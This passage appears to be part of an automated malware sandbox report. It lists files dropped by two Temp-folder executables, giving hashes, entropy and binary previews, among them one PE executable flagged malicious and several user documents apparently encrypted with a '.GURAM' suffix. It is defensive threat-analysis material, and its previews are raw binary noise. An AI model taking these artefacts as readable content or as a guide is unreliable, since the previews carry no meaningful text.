                                                                                                                                                                                                                                                SHA1:510F9C86784FB3A73B63A8DAD78BB2C45B383BF1
                                                                                                                                                                                                                                                SHA-256:5546380197EAFA306C859CCF3C72FFCF582DC28C9337E0B5459FAD51DEFB1ED6
                                                                                                                                                                                                                                                SHA-512:D7547D667223F70396E09F430BA6AA7A9DAE10FCC03C180BA6DEE8002711CDF1166041495CEC92830AF9A2C1F4808B6B2530E381A6ACED1EE3C359F6849371DA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....m.5~Lhy....V.P.eQ..D...4r...1.wd=+.rd.+...Yw.......{Cn5w{%.../.\...t.t..H.76\..........0[sKD2.4R..G.4..]Z....D.6..,...yks.m[!I...l.+|.......2.I.Qk$...y.5Z..[p.."{O.P....x....!.....C=.+.I..cr#..W.dF.6w.J.U.....b.?..e.a...^\.{.V._./...+m_.s....h...=.^..\.6r.....z..4...;z ..+.e].:.J..W...^..@.....E..=$.......v.V.;].h{.......=..m...8..|%..:...Y...A.R...'g.I".b......1.)N..........[.D'A.et.>......$..nA....OY...D.s(.(.i..w+.....,.....l..Z$.(.q.F.p.t...w..z...aJ.7=f..ds\..P~.5.j<.Vx7.*Z.9s...*...}..c..].5.....o.FE2..g_.p..&e.6.R.V..Z..B2....@.,.~..."..... .w<1...A...../%.)6.xf..>. .z[.#.3..2.T...Hg...G. .W.'/........8....(e.t.....)vLzl.....@h...6.........A..k........%0K(.L...]...sN..+p.D..@.D.../.dC....7..a..Y.o....f^.8#.../..sB...+.x..A.k@.e.w..kr..-\....".X..._.b.|.S..(...%...d..uX.t......._.b.q.%..X.3a.....-.......Ko...z.....?.n...oq.Af....HJ.c"..lu/.....m^...^.......m.....Na~.;q~.7.e.B..8P.....|....M..U.'.4. .CoZ.........>...&D

                                                                                                                                                                                                                                                C:\Users\user\Documents\HTAGVDFUIE.xlsx

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.866544219705061
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:wewd8blk7HIUk6LWFhYfVyii4o0jZtw5n:Ju4lQfyF+fVZle5n
                                                                                                                                                                                                                                                MD5:3D5C77C3EAC65D20CDBF484B5F1F290F
                                                                                                                                                                                                                                                SHA1:6FAD9EDDBC9EA7426D79593C501BB4266E02BA8F
                                                                                                                                                                                                                                                SHA-256:6E96CC207F45677E763868406C3A6CBA3A7D58A9FF6343630515DD81C8DBA559
                                                                                                                                                                                                                                                SHA-512:BB39D8A1DB818FDD852E52EA0655857B4E8051F846283F9C0F9EAECD2EF27935E2E0F88D2E9992AE9E3740E8031F71F92BA8ABC3D9EC1045039E6116D6A71CFB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.E...?...F.[..`b.fzJ.Z.A&e.hiu..t.-.'.5.t........9Q....}+..u.As./.!QK...R..JQ.R.9.]8..E[W#...d.c.+. N...S..Sgm4u.....5E...Q..oO...y~.c...U6.&.1N.Yp..d...""\.).|R...F....3"mf......M...("S.VX.5..F..:...F.k..."..yy.yKQ`..S.a.........*...]X.M)..Q.7H.A..1.7...4...cr.....u.B..KH.Y.h|..&6^.<.%...DEB..1.\........_...6..mj6JA^./CS&.*.o....D.|](xO.W.."..E.C..8.w,.9..h.8.K.&..}..0.....f.......MZ.....8MW....&xnw+3.....m.W......i.8Z.*..;6.7...NO.>..,*/7....BE.t..J..^v....i".6.tH...n..k....J.V..F..:?.i...N.....C9.:..Y....~).+.<q..0...B.pGK@.fu..4...fcM;&.p.....0...[z...........`........,c.?"...8 h..k.a..PJ"....J,...\.....Y-1.w...vR.....a.O.....".#.M..|....aK7...8.. ..k!q)14NG..R.)....~ ..&"..S...GD..Y.'h..Q.h...h...1.Y..& t`.~.?Q..$+Y...Mg.z8......xXa:0..!.....C......6...........Q.-.&./PUa.v.v..J..#3.?.H...l.Y..F.j[:9....q.....5..M'r45O"..6.~..7..u.].\.7.v..+9.iC...9.2.l.C.v..0.k$"4.0......(}.r.R.SC..=......F...a..A-.3v................J...e..S{y.*...

                                                                                                                                                                                                                                                C:\Users\user\Documents\HTAGVDFUIE.xlsx.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.866544219705061
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:wewd8blk7HIUk6LWFhYfVyii4o0jZtw5n:Ju4lQfyF+fVZle5n
                                                                                                                                                                                                                                                MD5:3D5C77C3EAC65D20CDBF484B5F1F290F
                                                                                                                                                                                                                                                SHA1:6FAD9EDDBC9EA7426D79593C501BB4266E02BA8F
                                                                                                                                                                                                                                                SHA-256:6E96CC207F45677E763868406C3A6CBA3A7D58A9FF6343630515DD81C8DBA559
                                                                                                                                                                                                                                                SHA-512:BB39D8A1DB818FDD852E52EA0655857B4E8051F846283F9C0F9EAECD2EF27935E2E0F88D2E9992AE9E3740E8031F71F92BA8ABC3D9EC1045039E6116D6A71CFB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.E...?...F.[..`b.fzJ.Z.A&e.hiu..t.-.'.5.t........9Q....}+..u.As./.!QK...R..JQ.R.9.]8..E[W#...d.c.+. N...S..Sgm4u.....5E...Q..oO...y~.c...U6.&.1N.Yp..d...""\.).|R...F....3"mf......M...("S.VX.5..F..:...F.k..."..yy.yKQ`..S.a.........*...]X.M)..Q.7H.A..1.7...4...cr.....u.B..KH.Y.h|..&6^.<.%...DEB..1.\........_...6..mj6JA^./CS&.*.o....D.|](xO.W.."..E.C..8.w,.9..h.8.K.&..}..0.....f.......MZ.....8MW....&xnw+3.....m.W......i.8Z.*..;6.7...NO.>..,*/7....BE.t..J..^v....i".6.tH...n..k....J.V..F..:?.i...N.....C9.:..Y....~).+.<q..0...B.pGK@.fu..4...fcM;&.p.....0...[z...........`........,c.?"...8 h..k.a..PJ"....J,...\.....Y-1.w...vR.....a.O.....".#.M..|....aK7...8.. ..k!q)14NG..R.)....~ ..&"..S...GD..Y.'h..Q.h...h...1.Y..& t`.~.?Q..$+Y...Mg.z8......xXa:0..!.....C......6...........Q.-.&./PUa.v.v..J..#3.?.H...l.Y..F.j[:9....q.....5..M'r45O"..6.~..7..u.].\.7.v..+9.iC...9.2.l.C.v..0.k$"4.0......(}.r.R.SC..=......F...a..A-.3v................J...e..S{y.*...

                                                                                                                                                                                                                                                C:\Users\user\Documents\JEBGCBAFCG.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3223040
                                                                                                                                                                                                                                                Entropy (8bit):6.589089679322374
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:yZ1m9In5PVRjbnKSoNK1yoJFk/yUXeo7HH4MBQC+kQFw:yZ0In9V1nKR4yiFkqUX0C+9w
                                                                                                                                                                                                                                                MD5:197F7A10814E446EE3D649F2509B1608
                                                                                                                                                                                                                                                SHA1:A459EC5320318E01318105D8E87E707EA480A4C7
                                                                                                                                                                                                                                                SHA-256:B4AB50C0C3A89046764D4B805C9C4CF5CBE6AE07AA2EDDB5E445C11479A912CE
                                                                                                                                                                                                                                                SHA-512:B595F5B8DE7ECF96CB18F9F1DE10BBB4988BB9B6412E1837B49469B78F7F15BBAE661B8092B1D46FA6D2BDFEAA5F0E8E0F493C70DBE7D94C66CBA325D83E6C85
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................01...........@..........................`1.......2...@.................................W...k.......H...................<.1...............................1..................................................... . ............................@....rsrc...H...........................@....idata ............................@...utqttalq.p*......p*.................@...cjsrlafd..... 1.......1.............@....taggant.0...01.."....1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\Documents\KATAXZVCPS.pdf

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.852665793978779
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:uB7WiZBWuTuT0tMmTncpme9Nofy5tBFPfR0XAcF2jmJrc0YXUZtwsTyvk:SvHruT0t/nm9Nofy5B7p4o0jZtwhk
                                                                                                                                                                                                                                                MD5:C9C55D3290F8B4F43EF9430402803990
                                                                                                                                                                                                                                                SHA1:0D8786B9A1C6BF6B928BC818E336A563D88270A6
                                                                                                                                                                                                                                                SHA-256:5A65E765DE29F5592BCD8A31632C5D992AFDC4A2871511790065E89F1A5DEDED
                                                                                                                                                                                                                                                SHA-512:0A2D415E91F8BE41EE524D150D4816C72953B7F9696E822B2966AE12F9AC564520405628B1243DB2F6300AD8ABFF2372375FB2401D81F5DADA19B17D5986735C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:+.gPB.y.Zr....r...k....o96].B'..kV.R...ai\...,...w..-F.d2..%Jq...g..l+..8.^.J.3rm.b.|+g...3..L.I^.X....!.C.0S.2oH.9..\......fj.n.....R.....:X..A.8..a,.....h[.>..d..>.....b .i.1.....;..oA.a.Dl...y...`.p..#.......f......W.....Sl#3......ASG..y..90b.|....*>..?%...B.*.>e.C.}.I@.8...T...{`..?J..9jg'U..&......+..O..O........N...d.?_.r.....4.....!.:.\...........=F...u.5.TO_..WL_.~j....}79..?8..+.?jh.t..h...9.~1...1r..Xn..`.B........oa...<...H8..8.[...G.i...............C..C.......l%DtA.....@.....P...Z..>..-w;..z...t=........uL@].G..R.uh.z.(s.qh..9.[...Et..[I...$u.s%.}..U.t$E...w..vgC.h.In....:.R.5.8.....`...$.VW.U.....?#.bW.R..-..H...V.....Z.F..#s.-...?].\h....9....5lb......4=.)YL..2a;..O..\Nh.K..:...t]'..Oc-...b..>;g...Y.+.....QP.... .Z.....%2K%.9..1..JJ;.d..T.0............Tw......e4e*..I{Q.R.r....#.=~i...;......4..^..].Bp...bE.$.A........I>6g.....s....k1......9......f.kY.'..r..TKtf.,bL.4..1.VXE...miH(m.d..k/F..X.6..%.a.........7t ..5..o..a#

                                                                                                                                                                                                                                                C:\Users\user\Documents\KATAXZVCPS.pdf.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.852665793978779
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:uB7WiZBWuTuT0tMmTncpme9Nofy5tBFPfR0XAcF2jmJrc0YXUZtwsTyvk:SvHruT0t/nm9Nofy5B7p4o0jZtwhk
                                                                                                                                                                                                                                                MD5:C9C55D3290F8B4F43EF9430402803990
                                                                                                                                                                                                                                                SHA1:0D8786B9A1C6BF6B928BC818E336A563D88270A6
                                                                                                                                                                                                                                                SHA-256:5A65E765DE29F5592BCD8A31632C5D992AFDC4A2871511790065E89F1A5DEDED
                                                                                                                                                                                                                                                SHA-512:0A2D415E91F8BE41EE524D150D4816C72953B7F9696E822B2966AE12F9AC564520405628B1243DB2F6300AD8ABFF2372375FB2401D81F5DADA19B17D5986735C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:+.gPB.y.Zr....r...k....o96].B'..kV.R...ai\...,...w..-F.d2..%Jq...g..l+..8.^.J.3rm.b.|+g...3..L.I^.X....!.C.0S.2oH.9..\......fj.n.....R.....:X..A.8..a,.....h[.>..d..>.....b .i.1.....;..oA.a.Dl...y...`.p..#.......f......W.....Sl#3......ASG..y..90b.|....*>..?%...B.*.>e.C.}.I@.8...T...{`..?J..9jg'U..&......+..O..O........N...d.?_.r.....4.....!.:.\...........=F...u.5.TO_..WL_.~j....}79..?8..+.?jh.t..h...9.~1...1r..Xn..`.B........oa...<...H8..8.[...G.i...............C..C.......l%DtA.....@.....P...Z..>..-w;..z...t=........uL@].G..R.uh.z.(s.qh..9.[...Et..[I...$u.s%.}..U.t$E...w..vgC.h.In....:.R.5.8.....`...$.VW.U.....?#.bW.R..-..H...V.....Z.F..#s.-...?].\h....9....5lb......4=.)YL..2a;..O..\Nh.K..:...t]'..Oc-...b..>;g...Y.+.....QP.... .Z.....%2K%.9..1..JJ;.d..T.0............Tw......e4e*..I{Q.R.r....#.=~i...;......4..^..].Bp...bE.$.A........I>6g.....s....k1......9......f.kY.'..r..TKtf.,bL.4..1.VXE...miH(m.d..k/F..X.6..%.a.........7t ..5..o..a#

                                                                                                                                                                                                                                                C:\Users\user\Documents\KZWFNRXYKI.png

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.8769754484566565
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:M0Jr3rwI655ubxBfRHg7r9u2nNBFF/ww6oZwujmJrc0YXUZtwsTW28QHE:M0Jrrg55sB67r9uefY704o0jZtw5
                                                                                                                                                                                                                                                MD5:AC22597D90E5E20AD377A9A894C13C5B
                                                                                                                                                                                                                                                SHA1:275AA2ED4B9FDA5CFB5ADC1A482EB7FA42CBCE76
                                                                                                                                                                                                                                                SHA-256:B7460CB38DA11346DF848517EBCDA1763DFFED4E7A4FBA3CCFA647F48A970B89
                                                                                                                                                                                                                                                SHA-512:D6CF79022526E30C5A8FC3DC810FA1C69E1090A3DDE44D7377D0575F42EAF6E2F271C1345575BF946B547A554127C35E5D68D99D4651CC1ACD524F1B5F3804B2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:(!./.f.......>.H...T.=..O..FH:W..p..+0v;Vx#=Ac.9=.8~..;wR.,..{..."?/h....M..1(..J...qU..Gr...-..8Lic...k...t..!T,8....*....c..........P...b.G..$k>..,.../..>...."O.......1.....p39.@.:d.Ni......q.J..KC.Y.r.4.GM._.....$DM..xs...J.z..f..(z..........1...o.p...P...efwz;...XJ..l...6.@.....t.WR..H-^Lk..LY..X.{._.......*..1....I .f.b.B...K.r7...............".....i..u<8p..u.V..][....\......w..#..hA"Dzh%......g..C..z.B....U..y.......PE$.".QQ..\.paZ......d...d7|....$...N".Z@pE...../....n...)K4.m.M.&.E.w..*....K.+.9z.6.Vuf>...>"..l....g..6./.5....]b.....P..?.dF....h._..`.....n.J.8_....K..B.|..8y.LT..-$h.I..l..,.......k..........o..lT.......tn....$..`...Zy.2|.E..'".E!^.sDX.#....I.v.q....D.....q....O.~.t....+.U......q..'u7...........d`.w.>...6.?.......#V.... ..Z.enI.=...;...!...Ax1t.A.z&..As.{.&y.2.......]... 8..iv.>....Zf/a.~K.q....3,.*).]....3.Nx.\.#.k7B.'..fP0.qwv...5Qbys..t(.M..<?...!F.y.5U...r.`8zFX....q....DWe..........5.-~..;.....O.7.8D6.....

                                                                                                                                                                                                                                                C:\Users\user\Documents\KZWFNRXYKI.png.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.8769754484566565
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:M0Jr3rwI655ubxBfRHg7r9u2nNBFF/ww6oZwujmJrc0YXUZtwsTW28QHE:M0Jrrg55sB67r9uefY704o0jZtw5
                                                                                                                                                                                                                                                MD5:AC22597D90E5E20AD377A9A894C13C5B
                                                                                                                                                                                                                                                SHA1:275AA2ED4B9FDA5CFB5ADC1A482EB7FA42CBCE76
                                                                                                                                                                                                                                                SHA-256:B7460CB38DA11346DF848517EBCDA1763DFFED4E7A4FBA3CCFA647F48A970B89
                                                                                                                                                                                                                                                SHA-512:D6CF79022526E30C5A8FC3DC810FA1C69E1090A3DDE44D7377D0575F42EAF6E2F271C1345575BF946B547A554127C35E5D68D99D4651CC1ACD524F1B5F3804B2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:(!./.f.......>.H...T.=..O..FH:W..p..+0v;Vx#=Ac.9=.8~..;wR.,..{..."?/h....M..1(..J...qU..Gr...-..8Lic...k...t..!T,8....*....c..........P...b.G..$k>..,.../..>...."O.......1.....p39.@.:d.Ni......q.J..KC.Y.r.4.GM._.....$DM..xs...J.z..f..(z..........1...o.p...P...efwz;...XJ..l...6.@.....t.WR..H-^Lk..LY..X.{._.......*..1....I .f.b.B...K.r7...............".....i..u<8p..u.V..][....\......w..#..hA"Dzh%......g..C..z.B....U..y.......PE$.".QQ..\.paZ......d...d7|....$...N".Z@pE...../....n...)K4.m.M.&.E.w..*....K.+.9z.6.Vuf>...>"..l....g..6./.5....]b.....P..?.dF....h._..`.....n.J.8_....K..B.|..8y.LT..-$h.I..l..,.......k..........o..lT.......tn....$..`...Zy.2|.E..'".E!^.sDX.#....I.v.q....D.....q....O.~.t....+.U......q..'u7...........d`.w.>...6.?.......#V.... ..Z.enI.=...;...!...Ax1t.A.z&..As.{.&y.2.......]... 8..iv.>....Zf/a.~K.q....3,.*).]....3.Nx.\.#.k7B.'..fP0.qwv...5Qbys..t(.M..<?...!F.y.5U...r.`8zFX....q....DWe..........5.-~..;.....O.7.8D6.....

                                                                                                                                                                                                                                                C:\Users\user\Documents\LTKMYBSEYZ.mp3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.868284702051104
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:4vhr7FQoh/eRy2ca2GPVABXyfrVv4o0jZtwI:4JrRQeM2EVABihMleI
                                                                                                                                                                                                                                                MD5:F4A83B0800B106971964F7E0DE204579
                                                                                                                                                                                                                                                SHA1:F454D0AD1E13D01FB025CEF442C4B9953025533B
                                                                                                                                                                                                                                                SHA-256:B82A18FBEA19EDE45722A522566C13BBE844DC3CFE16BBD132ECB1553806F30D
                                                                                                                                                                                                                                                SHA-512:93131F5404219CCF73C1F4483929A9C27A280AC342BE906CBF404D7F7D9E49EC6A4AEA16D252DEAE288728688DA916E48D625E68EC999991D0D92F2536EC1AC2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.>....%x.v.c3..'....^......Y=..dh..K.0.vs.4....GN..U..&.... .........?M.[.J3.wo...V..+....l..}#.`..\.#K.......gT."v......du...Pi.1z+..n........'y.....{.Do!.,..`i....B.SH..x.SsL.$B.Va.Sg.|=..U......m..k.......>.~q..jvQ...V.^S.c.4.!_.K...&.i:...~.K+.R.$g....s.JV%B...i.+..9iV..P.i%.z..b.?...ES....\3/.z...........iTz.l..Q.......4.5..9..3..]....e+.1.t.4.a.H....w...=..V.Q....r..}T.......S.a...F.@.@...k..L8.<.3.5.".4^.....[.......Q.h...K.......%4......#p..3..R....p..Q..@U.E...".@u..1.\.?.I......$..m5.G._h.S........8SG..g..o.d..G..k.......o....=~.4....fd..6....E......6....C).....O:..0.....Y..e..U.Q.u.C..N.[..}.x:\.}.O.....N{..2.r..J..N.8.|;,....8...O...#:k......7..Z/V....s.l......1:."...:..=.s..7+Q.-'.h.<7./..>.o....<^`..^..-J.-..nOs.....Q...x.....8.0.~x...0..J.........~.rM.{2.R3...D.....c..E.....r.v..d.9 U...JN=...~p.8u..nFM..X..g......t. ......v...|.]...}J....).;U..{Uh.M4 &a../..B..#..#....3 .J.&2..{.>E...W..&c..s.k..>^.I.....Q....cf..spy..<.TF

                                                                                                                                                                                                                                                C:\Users\user\Documents\LTKMYBSEYZ.mp3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.868284702051104
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:4vhr7FQoh/eRy2ca2GPVABXyfrVv4o0jZtwI:4JrRQeM2EVABihMleI
                                                                                                                                                                                                                                                MD5:F4A83B0800B106971964F7E0DE204579
                                                                                                                                                                                                                                                SHA1:F454D0AD1E13D01FB025CEF442C4B9953025533B
                                                                                                                                                                                                                                                SHA-256:B82A18FBEA19EDE45722A522566C13BBE844DC3CFE16BBD132ECB1553806F30D
                                                                                                                                                                                                                                                SHA-512:93131F5404219CCF73C1F4483929A9C27A280AC342BE906CBF404D7F7D9E49EC6A4AEA16D252DEAE288728688DA916E48D625E68EC999991D0D92F2536EC1AC2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.>....%x.v.c3..'....^......Y=..dh..K.0.vs.4....GN..U..&.... .........?M.[.J3.wo...V..+....l..}#.`..\.#K.......gT."v......du...Pi.1z+..n........'y.....{.Do!.,..`i....B.SH..x.SsL.$B.Va.Sg.|=..U......m..k.......>.~q..jvQ...V.^S.c.4.!_.K...&.i:...~.K+.R.$g....s.JV%B...i.+..9iV..P.i%.z..b.?...ES....\3/.z...........iTz.l..Q.......4.5..9..3..]....e+.1.t.4.a.H....w...=..V.Q....r..}T.......S.a...F.@.@...k..L8.<.3.5.".4^.....[.......Q.h...K.......%4......#p..3..R....p..Q..@U.E...".@u..1.\.?.I......$..m5.G._h.S........8SG..g..o.d..G..k.......o....=~.4....fd..6....E......6....C).....O:..0.....Y..e..U.Q.u.C..N.[..}.x:\.}.O.....N{..2.r..J..N.8.|;,....8...O...#:k......7..Z/V....s.l......1:."...:..=.s..7+Q.-'.h.<7./..>.o....<^`..^..-J.-..nOs.....Q...x.....8.0.~x...0..J.........~.rM.{2.R3...D.....c..E.....r.v..d.9 U...JN=...~p.8u..nFM..X..g......t. ......v...|.]...}J....).;U..{Uh.M4 &a../..B..#..#....3 .J.&2..{.>E...W..&c..s.k..>^.I.....Q....cf..spy..<.TF

                                                                                                                                                                                                                                                C:\Users\user\Documents\LTKMYBSEYZ.pdf

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.872256678644992
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:IHV/Qj5L1fThCzYBq4VCiwpt+v+bmkegiLvE3wO3YsnGjmJrc0YXUZtwsTWzqJz5:kQtZhCzUqZ+r7LvEAOIeY4o0jZtwVc
                                                                                                                                                                                                                                                MD5:A917AB6C5FC03D112DA811501556A57C
                                                                                                                                                                                                                                                SHA1:B79411E6F6C099077D082B4D8B6A447B034587B8
                                                                                                                                                                                                                                                SHA-256:879D448311735DEF1F027B607744DBA77223B5FBE1063BC70F1136075DC823B8
                                                                                                                                                                                                                                                SHA-512:D9D900CB86156F78E0B39C10DB6C78B50EE5893DE743C681D93ECD5C916433046D500DCF1A91AD60CC884C226545BEFA82F3E3C34C7180EC5BF2A6CDD5A3F77E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......./..k.an..Y.T.A.....Q....MX.v&..{..........j....3..E....Pr._..;....68....b......gN7.aIC.......(~,3J../.....-...7...[.f.....g...2v.;tY6.G..B)n...a._....z.p ;e.......x.Z5.....7.;..z....A....S!f.a}..m..j.6.2|r.j......_..liPO;.NJ.e..I.....JTY../ONm.?....am^z7#..~.,~s~............../....s...Se....V.-.!.S....p...(.qV...}.Zl0~....y!K<:..,...".{....(....Zk...v6...h.$9.qi.K..@....>_.u.V..@.q._.J..N..5....c....+..m .0..H!2.x.m..M e.'.../....u)..Ie.....~GTP.......XLfb{..1...F.].7.t).j5EQ@2.}..[4...Z.W.f}d...#2..........W...WI.D......./J...F.....`.u.1.#..pf)9......L..X.M.r...].Ya.H.."&.'.2...+W..m....He..).L.i.[.....P...L/.@;./....ZtZ2.X.`.eu{...UoDJ......../.a%......2....40.]...........sN.......*.....6.....P..B...S.DWj..0.(K...MF.r*5..l.2.^....r...>\Cf.7C.g.Pz.[.7.. .q.w...>..{.@nv.......%..1..HG...i...u?@I.....2.kU......\....Y"...(....:..C.9.j...c./S...$.>....\..u.o..P..G......JM...r.....If9H.e;..t.S(.....Y..JF.W.&U:6F.QI....O..5D_..{"-...

                                                                                                                                                                                                                                                C:\Users\user\Documents\LTKMYBSEYZ.pdf.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.872256678644992
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:IHV/Qj5L1fThCzYBq4VCiwpt+v+bmkegiLvE3wO3YsnGjmJrc0YXUZtwsTWzqJz5:kQtZhCzUqZ+r7LvEAOIeY4o0jZtwVc
                                                                                                                                                                                                                                                MD5:A917AB6C5FC03D112DA811501556A57C
                                                                                                                                                                                                                                                SHA1:B79411E6F6C099077D082B4D8B6A447B034587B8
                                                                                                                                                                                                                                                SHA-256:879D448311735DEF1F027B607744DBA77223B5FBE1063BC70F1136075DC823B8
                                                                                                                                                                                                                                                SHA-512:D9D900CB86156F78E0B39C10DB6C78B50EE5893DE743C681D93ECD5C916433046D500DCF1A91AD60CC884C226545BEFA82F3E3C34C7180EC5BF2A6CDD5A3F77E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
